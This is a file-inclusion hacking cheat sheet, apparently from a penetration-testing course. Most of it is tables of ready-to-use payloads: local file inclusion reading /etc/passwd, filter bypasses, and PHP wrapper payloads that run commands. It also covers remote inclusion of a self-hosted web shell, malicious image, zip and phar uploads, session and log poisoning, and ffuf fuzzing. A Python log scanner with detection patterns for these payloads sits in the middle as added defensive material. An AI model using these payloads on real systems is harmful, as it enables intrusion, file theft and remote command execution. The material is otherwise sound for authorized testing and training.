FILE INCLUSION
CHEAT SHEET
Local File Inclusion

Basic LFI

| Command | Description |
| --- | --- |
| `/[Link]?language=/etc/passwd` | Basic LFI |
| `/[Link]?language=../../../../etc/passwd` | LFI with path traversal |
| `/[Link]?language=/../../../etc/passwd` | LFI with name prefix |
| `/[Link]?language=./languages/../../../../etc/passwd` | LFI with approved path |

LFI Bypasses

| Command | Description |
| --- | --- |
| `/[Link]?language=....//....//....//....//etc/passwd` | Bypass basic path traversal filter |
| `/[Link]?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding |
| `/[Link]?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) |
| `/[Link]?language=../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) |
| `/[Link]?language=php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter |

Remote Code Execution

PHP Wrappers

| Command | Description |
| --- | --- |
| `/[Link]?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper |
| `curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "[Link]<PORT>/[Link]?language=php://input&cmd=id"` | RCE with input wrapper |
| `curl -s "[Link]` | RCE with expect wrapper |

RFI

| Command | Description |
| --- | --- |
| `echo '<?php system($_GET["cmd"]); ?>' > [Link] && python3 -m [Link] <LISTENING_PORT>` | Host web shell |
| `/[Link]?language=[Link]` | Include remote PHP web shell |

LFI + Upload

| Command | Description |
| --- | --- |
| `echo 'GIF8<?php system($_GET["cmd"]); ?>' > [Link]` | Create malicious image |
| `/[Link]?language=./profile_images/[Link]&cmd=id` | RCE with malicious uploaded image |
| `echo '<?php system($_GET["cmd"]); ?>' > [Link] && zip [Link] [Link]` | Create malicious zip archive 'as jpg' |
| `/[Link]?language=zip://[Link]%[Link]&cmd=id` | RCE with malicious uploaded zip |
| `php --define [Link]=0 [Link] && mv [Link] [Link]` | Create malicious phar 'as jpg' |
| `/[Link]?language=phar://./profile_images/[Link]%[Link]&cmd=id` | RCE with malicious uploaded phar |

Log Poisoning

| Command | Description |
| --- | --- |
| `/[Link]?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP session parameters |
| `/[Link]?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell |
| `/[Link]?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session |
| `curl -s "[Link] -A '<?php system($_GET["cmd"]); ?>'` | Poison server log |
| `/[Link]?language=/var/log/apache2/[Link]&cmd=id` | RCE through poisoned PHP session |

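
Detection example (added here, not part of the original cheat sheet): a log scanner that decodes each query parameter and flags the payload classes listed above, namely traversal (including the `....//` form), URL-encoded variants, null bytes, PHP wrappers, remote URLs and injected PHP code. The `index.php` file name, the combined log format, the indicator names and the handling of double encoding are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Indicator patterns mirror the payload classes in the tables above.
INDICATORS = {
    "traversal": re.compile(r"(^|[/\\])\.\.+[/\\]"),  # ../ and ....// forms
    "wrapper": re.compile(r"^(php|data|expect|zip|phar)://", re.I),
    "remote_url": re.compile(r"^(https?|ftp)://", re.I),
    "null_byte": re.compile(r"\x00"),
    "php_code": re.compile(r"<\?php", re.I),  # session or log poisoning
    "sensitive_path": re.compile(r"etc/passwd|/var/lib/php/sessions/|/var/log/apache2/"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); index.php is an assumption.
SAMPLE_LOG = (
    '198.51.100.9 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language='
    '....//....//etc/passwd HTTP/1.1" 200 2287 "-" "curl/8.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" '
    '200 2287 "-" "<?php /* constructed */ ?>"',
)

def decode_fully(value, rounds=3):
    """Undo nested URL encoding (%252e -> %2e -> .), bounded to `rounds`."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(raw_value):
    """Return the sorted indicator names matched by one raw parameter value."""
    value = decode_fully(raw_value)
    return sorted(n for n, rx in INDICATORS.items() if rx.search(value))

def scan_log_line(line):
    """Map parameter name -> indicators for one log line; {} when clean."""
    findings = {}
    match = REQUEST.search(line)
    if match:
        query = match.group(1).partition("?")[2]
        for pair in filter(None, query.split("&")):
            name, _, raw = pair.partition("=")
            if classify(raw):
                findings[name] = classify(raw)
    rest = line[match.end():] if match else line
    if INDICATORS["php_code"].search(decode_fully(rest)):
        findings["<headers>"] = ["php_code"]  # e.g. a poisoned User-Agent
    return findings
```

Matching happens only after decoding, so the encoded and plain forms of the same payload produce the same finding.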
Misc

| Command | Description |
| --- | --- |
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/[Link]:FUZZ -u '[Link] -fs 2287` | Fuzz page parameters |
| `ffuf -w /opt/useful/SecLists/Fuzzing/LFI/[Link]:FUZZ -u '[Link]<PORT>/[Link]?language=FUZZ' -fs 2287` | Fuzz LFI payloads |
| `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-[Link]:FUZZ -u '[Link]language=../../../../FUZZ/[Link]' -fs 2287` | Fuzz webroot path |
| `ffuf -w ./LFI-WordList-Linux:FUZZ -u '[Link]language=../../../../FUZZ' -fs 2287` | Fuzz server configurations |

LFI Wordlists
[Link]
Webroot path wordlist for Linux
Webroot path wordlist for Windows
Server configurations wordlist for Linux
Server configurations wordlist for Windows
File Inclusion Functions
Function Read Content Execute Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
[Link]()
[Link]()
[Link]()
Java
include
import
.NET
@[Link]()
@[Link]()
[Link]()
include